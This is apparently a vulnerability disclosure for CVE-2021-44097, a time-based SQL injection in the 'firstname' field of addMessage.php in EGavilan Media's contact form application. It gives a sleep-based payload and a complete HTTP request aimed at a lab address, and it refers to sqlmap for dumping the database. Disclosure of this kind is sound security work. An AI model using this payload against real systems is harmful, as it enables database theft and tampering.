CVE-2021–44097

# Exploit Title : SQL injection vulnerability in EGavilan Media Contact-Form-With-Messages-Entry-Management 1.0 via “Addmessage.php”. that allows a remote attacker to compromise Application SQL database.

#Exploit Author : Shubham Pandey

#Vendor : EGavilan Media

#Application Link : https://egavilanmedia.com/contact-form-with-messages-entry-management-with-php-and-mysql/

#Github Link: https://github.com/EGavilan-Media/Contact-Form-With-Messages-Entry-Management

#Version: 1.0

# CVE Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44097

# CVE: CVE-2021–44097

What is SQL injection :

SQL injection is a type of online security flaw that allows an attacker to interfere with a web application’s database queries. It allows an attacker to see data that they wouldn’t ordinarily be able to see. This could include data belonging to other users or any other information that the app has access to. In many circumstances, an attacker can modify or remove this data, causing the application’s content or behavior to be permanently altered.

Attack Vector:

By exploiting the login Page parameters Using tool like SQLMAP An attacker can dump entire data from the database. The data dumped can further lead to tampering the confidentiality of the user s personal, transaction details and financial information, various session tokens of the users etc. The data obtained can also be publicly disclosed or used for competitive gains leading to financial loss to an organization.

Vulnerable Parameter: “firstname=”

Steps to Reproduce:

1. Put = ‘%2b(select*from(select(sleep(20)))a)%2b’ and verify SQL Database response, if response come after 20 sec that mean Application SQL database is passing given query.

Login page request -
POST /Contact-Form-With-Messages-Entry-Management-master/process/contacts/addMessage.php HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 139
Origin: http://192.168.1.6
Connection: close
Referer: http://192.168.1.6/Contact-Form-With-Messages-Entry-Management-master/view/contact.php
Cookie: PHPSESSID=8jp0c36flam1krptku4bq9hvf5

firstname=test'%2b(select*from(select(sleep(20)))a)%2b'&lastname=test&email=sdsada%40gmail.com&phone=123123131&subject=test&message=rtesdas

3. Web Server accept our Payload and by using tools like “Sqlmap” we can see that payload gets executed and Database can be compromised.

Author: https://www.linkedin.com/in/shubham-pandey-10704014b/